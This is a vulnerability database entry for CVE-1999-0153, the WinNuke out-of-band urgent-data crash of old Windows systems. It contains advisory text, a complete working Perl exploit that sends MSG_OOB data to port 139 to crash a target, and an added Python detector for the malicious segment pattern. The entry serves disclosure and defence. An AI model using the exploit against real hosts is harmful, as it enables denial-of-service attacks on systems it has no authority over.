TCP/IP out-of-band (OOB) urgent-data denial-of-service vulnerability in early Windows systems

Vulnerability ID: 1105293    Vulnerability type: Unknown
Published: 1997-05-07    Updated: 2005-05-02
CVE ID: CVE-1999-0153
CNNVD ID: CNNVD-199707-008
Platform: Windows    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/20439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-008
|Vulnerability details
The TCP/IP protocol stack, implemented by nearly every operating system, is the most widely used networking protocol for Internet connectivity. Some older Windows versions do not handle TCP urgent data correctly: a remote attacker can exploit this to mount a denial-of-service attack against a server and crash the host. On 7 May 1997 someone released winnuke.c. It first establishes a TCP connection to a Win95/NT host and then sends TCP urgent data on it, which crashes the system. Because 139/TCP is the port most commonly found listening on Win95/NT systems, winnuke.c targets that port. The attack is called an "OOB attack" after the MSG_OOB flag used to send the data; strictly speaking it is a TCP urgent-data attack. <*Links: http://xforce.iss.net/static/173.php and http://www.ciac.org/ciac/bulletins/h-57.shtml*>
|Vulnerability EXP
source: http://www.securityfocus.com/bid/2010/info
  
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
  
According to Microsoft, "A sender specifies 'Out of Band' data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow."
  
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
  
Windows port 139 (NetBIOS session service) is the port most commonly hit by this attack, although any other listening TCP service can be affected in the same way. Rebooting the affected machine is required to resume normal system functioning.

#!/usr/bin/perl

# Ghent - [email protected] - Perl version of winnuke.c by _eci

use strict;
use Socket;

my ($h, $p, $in_addr, $proto, $addr);

# Target host from the first argument; port from the second, defaulting to
# 139/TCP (NetBIOS session service), the port the original winnuke.c used.
$h = $ARGV[0];
$p = $ARGV[1] || 139;
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; exit 1; }

$in_addr = (gethostbyname($h))[4] or die "cannot resolve $h\n";
$addr    = sockaddr_in($p, $in_addr);
$proto   = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

# An ordinary TCP connection; the crash is triggered by what is sent on it.
connect(S, $addr) or die $!;
select S; $| = 1; select STDOUT;    # make the socket handle unbuffered

# Send the payload as urgent data. MSG_OOB makes the local stack set URG and
# point the urgent pointer at the end of the segment with no normal data
# following it, which is the condition the vulnerable stacks mishandle.
print "Nuking: $h:$p\n";
send(S, "Sucker", MSG_OOB) or die $!;
print "Nuked!\n";
close S;
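The Microsoft description above says the crash condition is a segment with URG set whose urgent pointer reaches the end of the frame with no normal data after it. The following is an added example, not code from the original page or from winnuke's author: it builds raw TCP segments of that shape (the names build_tcp_segment, parse_tcp_segment, is_oob_nuke_pattern and scan_segments are this example's own), parses the header fields a detector would look at, and flags the WinNuke pattern while leaving legitimate urgent data alone. The sample segments are constructed, not captured; the one labelled SAMPLE_NUKE assumes the usual BSD-socket behaviour of MSG_OOB, which sets the urgent pointer to the end of the data sent.

```python
import struct

# TCP flag bits (low 9 bits of the data-offset/flags word, RFC 793 / RFC 3168).
FLAG_FIN, FLAG_SYN, FLAG_RST, FLAG_PSH, FLAG_ACK, FLAG_URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
TCP_HEADER_LEN = 20


def build_tcp_segment(src_port, dst_port, flags, payload, urg_ptr=0, seq=0, ack=0, window=8192):
    """Build a raw TCP segment: 20-byte header without options, checksum left as 0."""
    off_flags = (5 << 12) | (flags & 0x1FF)  # data offset = 5 words, then the flag bits
    header = struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, off_flags, window, 0, urg_ptr)
    return header + payload


def parse_tcp_segment(segment):
    """Parse a raw TCP segment (no IP header) into its header fields and payload."""
    if len(segment) < TCP_HEADER_LEN:
        raise ValueError("segment shorter than the %d-byte TCP header" % TCP_HEADER_LEN)
    src_port, dst_port, seq, ack, off_flags, window, checksum, urg_ptr = struct.unpack(
        "!HHIIHHHH", segment[:TCP_HEADER_LEN])
    data_offset = (off_flags >> 12) * 4
    if data_offset < TCP_HEADER_LEN or data_offset > len(segment):
        raise ValueError("data offset %d lies outside the segment" % data_offset)
    return {
        "src_port": src_port, "dst_port": dst_port, "seq": seq, "ack": ack,
        "flags": off_flags & 0x1FF, "window": window, "checksum": checksum,
        "urg_ptr": urg_ptr, "payload": segment[data_offset:],
    }


def is_oob_nuke_pattern(segment):
    """True when the segment carries urgent data with no normal data after it.

    That is the shape Microsoft describes for the crash: URG set and the urgent
    pointer at the end of the frame. BSD-derived senders (what winnuke relies on)
    put the pointer one past the last urgent octet; RFC 1122 puts it on the last
    urgent octet. ``urg_ptr + 1 >= len(payload)`` means "nothing in-band follows"
    under both conventions.
    """
    seg = parse_tcp_segment(segment)
    if not seg["flags"] & FLAG_URG:
        return False  # the urgent pointer field is only meaningful when URG is set
    return seg["urg_ptr"] + 1 >= len(seg["payload"])


def scan_segments(segments):
    """Classify a batch of raw segments; returns one verdict dict per segment."""
    verdicts = []
    for raw in segments:
        seg = parse_tcp_segment(raw)
        verdicts.append({
            "dst_port": seg["dst_port"],
            "urg": bool(seg["flags"] & FLAG_URG),
            "urg_ptr": seg["urg_ptr"],
            "payload_len": len(seg["payload"]),
            "oob_nuke": is_oob_nuke_pattern(raw),
        })
    return verdicts


# Constructed sample traffic (not captured data). SAMPLE_NUKE is what a BSD-style
# send(..., "Sucker", MSG_OOB) to 139/TCP produces: URG set, urgent pointer == payload length.
SAMPLE_NUKE = build_tcp_segment(40000, 139, FLAG_ACK | FLAG_PSH | FLAG_URG, b"Sucker", urg_ptr=6)
# Urgent data followed by normal data: a legitimate use of URG, not the crash pattern.
SAMPLE_MIXED = build_tcp_segment(40000, 139, FLAG_ACK | FLAG_PSH | FLAG_URG, b"Sucker" + b"normal", urg_ptr=6)
# URG clear: the urgent pointer field must be ignored even though it is non-zero.
SAMPLE_PLAIN = build_tcp_segment(40000, 139, FLAG_ACK | FLAG_PSH, b"Sucker", urg_ptr=6)

if __name__ == "__main__":
    for verdict in scan_segments([SAMPLE_NUKE, SAMPLE_MIXED, SAMPLE_PLAIN]):
        print(verdict)
```

The destination port is reported but deliberately not used as a match condition: the advisory text says 139/TCP is merely the most common victim, and the same segment shape crashes any other listening service. Feeding real traffic through this requires stripping the IP header first; the parser rejects truncated segments and data offsets that point outside the frame, so hostile header values cannot make it read past the buffer.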
|References

Source: OSVDB
Name: 1666
Link: http://www.osvdb.org/1666
